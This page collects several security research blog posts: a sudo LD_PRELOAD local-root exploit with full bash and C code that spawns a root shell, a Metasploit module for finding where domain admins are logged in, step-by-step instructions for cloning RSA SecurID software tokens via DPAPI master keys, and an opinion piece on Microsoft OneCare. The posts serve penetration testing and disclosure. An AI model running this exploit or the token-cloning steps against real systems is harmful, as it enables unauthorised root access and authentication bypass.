Grey bar Blue bar
Share this:

Wed, 28 Aug 2013

Something about sudo, Kingcope and re-inventing the wheel

Willems and I are currently on an internal assessment and have popped a couple hundred (thousand?) RHEL machines, which was trivial since they are all imaged. Anyhoo - long story short, we have a user which is allowed to make use of sudo for a few commands, such as reboot and service. I immediately thought it would be nice to turn this into a local root somehow. Service seemed promising and I had a looksy how it works. Whilst it does do sanitation of the library path it does not remove LD_PRELOAD. So if we could sneak LD_PRELOAD past sudo then all should be good ?


For lack of deeper understanding I googled around the issue and came across http://www.catonmat.net/blog/simple-ld-preload-tutorial which is a vanilla LD_PRELOAD example overiding glib's fopen() call. That sort of suited me well since I reckoned starting services will prolly read config files.


So after a little fiddling I came up with the following creature:



/* gcc -Wall -fPIC -shared -o myfopen.so myfopen.c */
/* http://www.catonmat.net/blog/simple-ld-preload-tutorial/ */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


FILE *fopen(const char *path, const char *mode) {
printf("MAKE ME A SANDWICH\n");
if (access("/tmp/sandwich", F_OK) != -1)
{
unlink("/tmp/sandwich");
system("/bin/bash");
}
else
{
//printf("fake fopen: not active \n");
}
return NULL;
}

which could be invoked via



#!/bin/bash
touch /tmp/sandwich
sudo LD_PRELOAD=/home/george/Desktop/playground/ld_preload/myfopen.so /etc/init.d/ssh restart

Best thing was it sort of worked! Ugly but functioning...
While trying to work out the finer details, however, I came across a sploit Kingcope had written in 2008, which exploited exactly this issue! Apparently older sudos did not "Defaults env_reset" or "Defaults setenv" which makes the LD_PRELOAD possible. (This still applies to [mis]configurations which preserve the environment)
As always with Kingcope sploits it is very elegant and definitely worth a look.


On a side note: the header of his sploit says:



# http://www.exploit-db.com/exploits/7129/
#
#* Sudo <= 1.6.9p18 local r00t exploit
#* by Kingcope/2008/www.com-winner.com
#
# Most lame exploit EVER!
#
# Needs a special configuration in the sudoers file:
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
#
# May also need the current users password to be typed in
# So this exploit is UBERLAME!
# First Argument to this shell file: A program your current
# user is allowed to execute via sudo. sudo has to be in
# the path!!
# successfully tested on FreeBSD-7.0 and RedHat Linux
# I don't even know why I realease such stuffz
# I'M GONNA GRAB A COFFE NOW;HAVE PHUN !!!

so Kingcope considered the vuln UEBERLAME ... I don't know if I should be proud or sad for having found it five years later then....
Anyhoo, at this point I was already pretty invested in the thing and decided to see the re-invention of the wheel through. Kingcope's shared object was a lot slicker than mine, hooking into _init() rather than fopen() which makes it a lot more generic and elegant. He used unsetenv(LD_PRELOAD) to execute but once which is also a lot more elegant.


So I shamelessly stole from his sploit... I don't see the need for a suid shell stager and fancy execls when a simple system() does the job, but I am prolly missing several points =) So without further waffle here it is - its called sandwhich sploit as an homage to the classic XKCD sudo comic.




1 #!/bin/bash
2 #
3 # old/misconfigured sudo local root
4 #
5 # disclosed by Kingcope in 2008
6 # http://www.exploit-db.com/exploits/7129/
7 #
8 # "re-discovered" in 2013 by
9 # george@sensepost.com
10 #
11
12
13 echo
14 echo "[!] $0 - sudo un-sanitised environment sploit"
15 echo "[!] usage: $0 <program to run via sudo> "
16 echo
17
18
19 cat > /tmp/sandwich.c << _EOF
20 #include <stdio.h>
21 #include <stdlib.h>
22 #include <unistd.h>
23 #include <sys/types.h>
24
25 void _init()
26 {
27 if (!geteuid())
28 {
29 unsetenv("LD_PRELOAD");
30 setgid(0);
31 setuid(0);
32 unlink("/tmp/sandwich.so");
33 unlink("/tmp/sandwich.c");
34 system("/bin/bash");
35 }
36 }
37
38 _EOF
39
40
41 gcc -fPIC -shared -o /tmp/sandwich.so /tmp/sandwich.c -nostartfiles
42 sudo LD_PRELOAD=/tmp/sandwich.so $1
43

Mon, 22 Apr 2013

Windows Domain Privilege Escalation : Implementing PSLoggedOn in Metasploit (+ a bonus history module)

There are multiple paths one could take to getting Domain Admin on a Microsoft Windows Active Directory Domain. One common method for achieving this is to start by finding a system where a privileged domain account, such as a domain admin, is logged into or has recently been logged into. Once access to this system has been gained, either stealing their security tokens (ala Incognito or pass-the-hash attacks) or querying Digest Authentication (with Mimikatz/WCE) to get their clear-text password. The problem is finding out where these user's are logged in.


I've often seen nmap and the smb-enum-sessions script (http://nmap.org/nsedoc/scripts/smb-enum-sessions.html) used to retrieve all the user sessions on the network. This (not so grep'pable) output is then grep'ed to find the hosts where our target user is logged in. The process of smb-enum-sessions and subsequent analysis can be quite time consuming and clumsy. On a recent assessment, multiple tunnels in, where uploading nmap wasn't a great idea, we realised that there has to be a better way of doing this. While searching for an alternative solution we came across PsLoggedOn (SysInternals Suite) which, with a single binary, allows you search the network for locations where a user is logged in. The downside with this is that it doesn't cleanly run via psexec or other remote shells and you need graphical logon to a system on the domain, and you need to upload another binary (the PsLoggedOn executable) to the target system. Examining how PsLoggedOn worked we figured out that it was simply using the Windows NetSessionEnum API. Having a look at the API I figured that it should be possible to write a simple post exploit module for Metasploit using the railgun.


After some trial and error, we now present enum_domain_user.rb a simple Metasploit post exploit module capable of finding network sessions for a specific user. Below is a screenshot of the module in action.



To use the module,


1.) Download and copy it to:
<msfinstall>/modules/post/windows/gather/
(we'll send a pull request to metasploit-framework's github shortly).


2.) In MSF:
use post/windows/gather/enum_domain_user


3.) Set the USER and SESSION variables.


4.) Then simply run it with "exploit".


The module can also be used directly from meterpreter with:
run post/windows/gather/enum_domain_user USER=username


Warning, this doesn't seem to work with x64 meterpreter yet mostly likely due to some memory pointer stuff I haven't worked out. Hopefully this will get updated shortly, or even better, one of you smart people out there can fix my horrible Ruby.

Bonus


As an added extra I've included a Metapsloit history plugin. This plugin will simply allow you to view all the commands executed since the module was loaded and then execute them "bash style".


Typing "history" will give display the last 10 commands executed. If you wish to see more commands, type history <numberof entries>


To run a command from the history list type:
history !<command number>


Below is an action shot of the history module.



To install:


1.) Download and Copy history.rb to the plugins folder: <msf install>/plugins/
2.) In msfconsole type: load history
3.) For usage info type: help history


Both modules are available for download on Github, and I'll submit a pull request to metasploit-framework shortly. Please feel free to fork and be merry. Any updates/fixes/comments are welcome.
Github: https://github.com/sensepost/metasploit

Thu, 17 May 2012

A closer look into the RSA SecureID software token

Widespread use of smart phones by employees to perform work related activities has introduced the idea of using these devices as an authentication token. As an example of such attempts, RSA SecureID software tokens are available for iPhone, Nokia and the Windows platforms. Obviously, mobile phones would not be able to provide the level of tamper-resistance that hardware tokens would, but I was interested to know how easy/hard it could be for a potential attacker to clone RSA SecureID software tokens. I used the Windows version of the RSA SecurID Software Token for Microsoft Windows version 4.10 for my analysis and discovered the following issues:

Device serial number of tokens can be calculated by a remote attacker :

Every instance of the installed SecurID software token application contains a hard drive plug-in (implemented in tokenstoreplugin.dll) that has a unique device serial number. This serial number can be used for "Device Binding" and the RSA documentation defines it as follows:

Before the software token is issued by RSA Authentication Manager, an additional extension attribute (<DeviceSerialNumber/>) can be added to the software token record to bind the software token to a specific devicedevice serial number is used to bind a token to a specific device. If the same user installs the application on a different computer, the user cannot import software tokens into the application because the hard drive plug-in on the second computer has a different device serial number from the one to which the user's tokens are bound”.
Reverse engineering the Hard-Disk plugin (tokenstoreplugin.dll) indicated that the device serial number is dependent on the system's host name and current user's windows security identifier (SID). An attacker, with access to these values, can easily calculate the target token's device serial number and bypass the above mentioned protection. Account SIDs can be enumerated in most of the Microsoft active directory based networks using publicly available tools, if the “enumeration of SAM accounts and shares” security setting was not set to disabled. Host names can be easily resolved using internal DNS or Microsoft RPC. The following figures show the device serial number generation code:

The SecureID device serial number calculation can be represented with the following formula:

device_serial_number=Left(SHA1(host_name+user_SID+“RSA Copyright 2008”),10)

Token's copy protection:

The software token information, including the secret seed value, is stored in a SQLite version 3 database file named RSASecurIDStorage under the “%USERPROFILE%\Local Settings\Application Data\RSA\RSA SecurID Software Token Library” directory. This file can be viewed by any SQLite database browser, but sensitive information such as the checksum and seed values are encrypted. RSA documentation states that this database file is both encrypted and copy protected: “RSA SecurID Software Token for Windows uses the following data protection mechanisms to tie the token database to a specific computer:

• Binding the database to the computer's primary hard disk drive

• Implementing the Windows Data Protection API (DPAPI)

These mechanisms ensure that an intruder cannot move the token database to another computer and access the tokens. Even if you disable copy protection, the database is still protected by DPAPI.”

The RSASecurIDStorage database file has two tables: PROPERTIES and TOKENS. The DatabaseKey and CryptoChecksum rows found in the PROPERTIES tables were found to be used for copy protection purpose as shown in the figure below:

Reverse engineering of the copy protection mechanism indicated that:

  • The CryptoChecksum value is encrypted using the machine's master key, which can only be decrypted on the same computer system, unless the attacker can find a way to import the machine key and other supporting data to their machine
  • The DatabaseKey is encrypted using the current logged-on user's master key and provides token binding to that user account
Previous research on the Microsoft Windows DPAPI internals has made offline decryption of the DPAPI protected data possible. This means that if the attacker was able to copy the RSA token database file along with the encryption master keys to their system (for instance by infecting a victim's machine with a rootkit), then it would be possible to decrypt the token database file on their machine. The detailed attack steps to clone a SecurID software token by copying the token database file from a victim's system are as follows:
  1. Copy the token database file, RSASecurIDStorage, from the user profile directory
  2. Copy the user's master key from %PROFILEDIR%\Application Data\Microsoft\Protect\%SID%; the current master key's GUID can be read from Preferred file as shown in the figure below:
  3. Copy the machine's master key from the %WINDIR%\system32\Microsoft\Protect\ directory. Microsoft Windows protects machine keys against tampering by using SHA1 hash values, which are stored and handled by the Local Security Authority Subsystem Service (LSASS) process in Microsoft Windows operating systems. The attacker should also dump these hash values from LSA using publicly available tools like lsadump.
  4. Having all the required master keys and token database file, install and deploy a windows machine and change the machine and user SIDs to the victim's system SID by using available tools such as newSID.
  5. Overwrite the token database file, user and machine master keys with the ones copied from victim's system. You would also need to find a way to update the DPAPI_SYSTEM value in LSA secrets of the Windows machine. Currently, this is the only challenge that I was not able to solve , but it should be possible to write a tool similar to lsadump which updates LSA secrets.
  6. When the above has been performed, you should have successfully cloned the victim's software token and if they run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim's token.
In order to demonstrate the possibility of the above mentioned attack, I installed and activated token A and token B on two separate windows XP virtual machines and attempted to clone token B on the virtual machine that was running token A. Taking the above steps, token B was successfully cloned on the machine running token A as shown in the following figures:

In order to counter the aforementioned issues, I would recommend the use of "trusted platform module" (TPM) bindings, which associates the software token with the TPM chip on the system (TPM chip for mobiles? there are vendors working on it).

Wed, 11 Jul 2007

Have a (one) care sir....

Someone in the office was discussing Microsoft's recent horrible foray into the anti-virus market. Apparently an online source held one-care as faring worse than a simple man with a perl script. A quick scan shows that they have indeed faired pretty poorly in independent tests:

"(BBC News) OneCare was the only failure among 17 anti-virus programs tested by the AV Comparatives organisation."

Now the obvious question was: How could Microsoft possibly get it so wrong? (Cue the drum roll, bring out your tin foil hats)

You have less people running around these days screaming "Microsoft just dont get security" (Compare a BlackHat today with a BlackHat 5 years ago where Microsoft employees hid their name badges more than any of the guys from 3 letter agencies did). There is little doubt that they have skilled engineers and that they quickly step up when they have to.. So how is it possible that they can do this badly at a new market they were keen to enter?

There are probably good reasons for it, but since i do have a shiny new tin foil hat, im going to run with a different ponderation. Microsoft knew they were going to take heat for patchguard (preventing 3rd parties from hooking into the kernel). They had to know that the Symantecs and McAfees of the world would be up in arms, about the fact that this would give Microsoft an unfair advantage in this space. This would affect not just their AV lines, but their HIPS products that Microsoft would surely want to bundle with the OS in the future..

Of course, Microsoft's biggest defense was to claim that their engineers were not given access to windows internals where their product competed with 3rd parties. Almost all of us responded with: "riiiiiiiigghtt...."

But then.. Microsoft releases one-care, and it really _does_ do poorly against its industry peers! Surely if one-care engineers had preferred treatment they would have done better? Surely this proves that they were honest all along??? From an MSFT point of view, it would be giving up fairly little (a market they have not yet come to rely on) to gain favor in markets where they do indeed have a lot to lose.. all in all.. it would make an excellent sacrificial lamb..